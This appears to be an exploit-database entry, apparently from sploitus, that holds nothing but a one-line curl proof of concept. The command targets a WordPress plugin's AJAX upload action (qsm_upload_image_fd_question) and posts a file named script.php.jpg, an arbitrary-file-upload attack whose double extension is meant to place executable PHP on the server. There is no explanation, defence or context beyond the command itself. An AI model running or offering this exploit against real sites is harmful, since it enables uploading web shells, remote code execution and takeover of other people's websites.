Share
## https://sploitus.com/exploit?id=WPEX-ID:10380
$ curl 'http://example.com/wp-admin/admin-ajax.php' -F 'action=qsm_upload_image_fd_question' -F 'question_id={some-id}' -F 'file=@script.php.jpg'